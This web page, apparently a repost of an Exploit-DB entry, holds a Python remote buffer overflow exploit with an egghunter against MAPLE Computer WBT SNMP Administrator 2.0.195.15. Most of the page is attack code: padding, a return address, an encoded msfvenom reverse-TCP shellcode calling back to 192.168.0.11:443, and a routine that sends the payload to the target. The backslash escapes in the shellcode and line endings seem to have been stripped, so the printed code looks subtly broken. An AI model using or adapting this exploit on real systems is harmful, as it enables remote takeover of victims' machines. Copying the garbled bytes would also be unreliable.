Exploit/Advisories

Published on July 19th, 2019 📆 | 2170 Views ⚑

0

MAPLE Computer WBT SNMP Administrator 2.0.195.15


iSpeech.org

# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)  


#!/usr/bin/python

import sys
import socket
import random
import string
import struct



def pattern_create(_type,_length):
  _type = _type.split(" ")

  if _type[0] == "trash":
    return _type[1] * _length
  elif _type[0] == "random":
    return ''.join(random.choice(string.lowercase) for i in range(_length))
  elif _type[0] == "pattern":
    _pattern = ''
    _parts = ['A', 'a', '0']
    while len(_pattern) != _length:
      _pattern += _parts[len(_pattern) % 3]
      if len(_pattern) % 3 == 0:
        _parts[2] = chr(ord(_parts[2]) + 1)
        if _parts[2] > '9':
          _parts[2] = '0'
          _parts[1] = chr(ord(_parts[1]) + 1)
          if _parts[1] > 'z':
            _parts[1] = 'a'
            _parts[0] = chr(ord(_parts[0]) + 1)
            if _parts[0] > 'Z':
              _parts[0] = 'A'
    return _pattern
  else:
    return "Not Found"

def pwned(_host, _port, _payload):
  print "[*] Conectandose a {0}:{1}...".format(_host, _port)
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((_host, _port))
  print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
  _payload = "{0}rnrn".format(_payload)
  s.send(_payload)
  _data = s.recv(1024)
  s.shutdown
  s.close
  print 'Recibido:', repr(_data)
  print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))


def main():

  _host = "192.168.0.12"
  _port = 987
  _offset_eip = 642200
  _padding = 642144
  _eip = "xc3x78xd7x5a" #call ebx 0x5AD778C3
  _tag = "w00tw00t"

  #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
  _shellcode = ("x89xe6xdaxd8xd9x76xf4x5dx55x59x49x49x49x49x49"
    "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
    "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
    "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
    "x39x6cx39x78x6cx42x53x30x73x30x35x50x35x30x4d"
    "x59x78x65x30x31x4bx70x51x74x6ex6bx36x30x54x70"
    "x4ex6bx33x62x74x4cx4ex6bx30x52x52x34x4cx4bx44"
    "x32x45x78x46x6fx6cx77x33x7ax31x36x64x71x6bx4f"
    "x6ex4cx65x6cx30x61x73x4cx74x42x46x4cx67x50x59"
    "x51x68x4fx36x6dx76x61x7ax67x59x72x4cx32x51x42"
    "x32x77x4ex6bx33x62x36x70x6ex6bx52x6ax47x4cx4e"
    "x6bx42x6cx76x71x61x68x5ax43x52x68x33x31x58x51"
    "x63x61x6cx4bx52x79x45x70x57x71x79x43x4cx4bx53"
    "x79x62x38x4bx53x44x7ax37x39x4cx4bx66x54x4cx4b"
    "x47x71x38x56x76x51x49x6fx6ex4cx7ax61x78x4fx34"
    "x4dx76x61x5ax67x56x58x79x70x33x45x49x66x66x63"
    "x51x6dx69x68x65x6bx73x4dx66x44x64x35x5ax44x50"
    "x58x4ex6bx30x58x37x54x47x71x59x43x63x56x6ex6b"
    "x44x4cx50x4bx4cx4bx46x38x75x4cx43x31x69x43x4e"
    "x6bx44x44x6cx4bx45x51x38x50x4dx59x57x34x36x44"
    "x51x34x51x4bx53x6bx33x51x71x49x53x6ax76x31x6b"
    "x4fx69x70x61x4fx63x6fx53x6ax6ex6bx62x32x58x6b"
    "x6ex6dx61x4dx75x38x55x63x37x42x53x30x77x70x52"
    "x48x54x37x74x33x57x42x71x4fx32x74x50x68x62x6c"
    "x51x67x36x46x56x67x6ex69x59x78x6bx4fx4ex30x6e"
    "x58x4ex70x73x31x55x50x53x30x56x49x48x44x53x64"
    "x66x30x45x38x76x49x6fx70x32x4bx33x30x79x6fx4e"
    "x35x43x5ax57x7ax31x78x6bx70x4fx58x75x50x76x6b"
    "x33x58x75x52x65x50x43x31x6dx6bx6cx49x48x66x72"
    "x70x76x30x76x30x66x30x43x70x46x30x61x50x72x70"
    "x32x48x6bx5ax56x6fx69x4fx4bx50x69x6fx48x55x7a"
    "x37x43x5ax56x70x31x46x36x37x43x58x6ex79x6ex45"
    "x42x54x51x71x4bx4fx39x45x4ex65x4bx70x43x44x46"
    "x6ax39x6fx70x4ex45x58x50x75x38x6cx49x78x33x57"
    "x35x50x35x50x73x30x32x4ax45x50x71x7ax64x44x31"
    "x46x50x57x42x48x64x42x78x59x4ax68x73x6fx49x6f"
    "x49x45x4dx53x48x78x73x30x71x6ex77x46x6ex6bx75"
    "x66x73x5ax57x30x73x58x67x70x34x50x47x70x47x70"
    "x46x36x70x6ax37x70x50x68x51x48x69x34x76x33x78"
    "x65x39x6fx79x45x5ax33x76x33x51x7ax55x50x66x36"
    "x71x43x52x77x31x78x56x62x78x59x6fx38x53x6fx49"
    "x6fx79x45x4ex63x58x78x45x50x71x6dx64x68x70x58"
    "x61x78x33x30x51x50x43x30x47x70x53x5ax53x30x70"
    "x50x51x78x64x4bx36x4fx44x4fx50x30x69x6fx58x55"
    "x31x47x31x78x54x35x52x4ex62x6dx35x31x49x6fx7a"
    "x75x31x4ex51x4ex4bx4fx64x4cx46x44x76x6fx6ex65"
    "x54x30x59x6fx79x6fx4bx4fx6bx59x4fx6bx69x6fx79"
    "x6fx39x6fx37x71x48x43x51x39x4fx36x74x35x6fx31"
    "x58x43x4fx4bx78x70x58x35x6ex42x43x66x70x6ax37"
    "x70x73x63x69x6fx59x45x41x41")

  _egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7")
 
  _inject =  pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
  _inject += _tag
  _inject += _shellcode
  _inject += _egghunter
  _inject +=  pattern_create("trash B", _offset_eip-len(_inject))
  _inject += _eip
  
  print(_inject)
  pwned(_host,_port,_inject)

if __name__ == "__main__":
    main()





https://www.exploit-db.com/exploits/47137

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑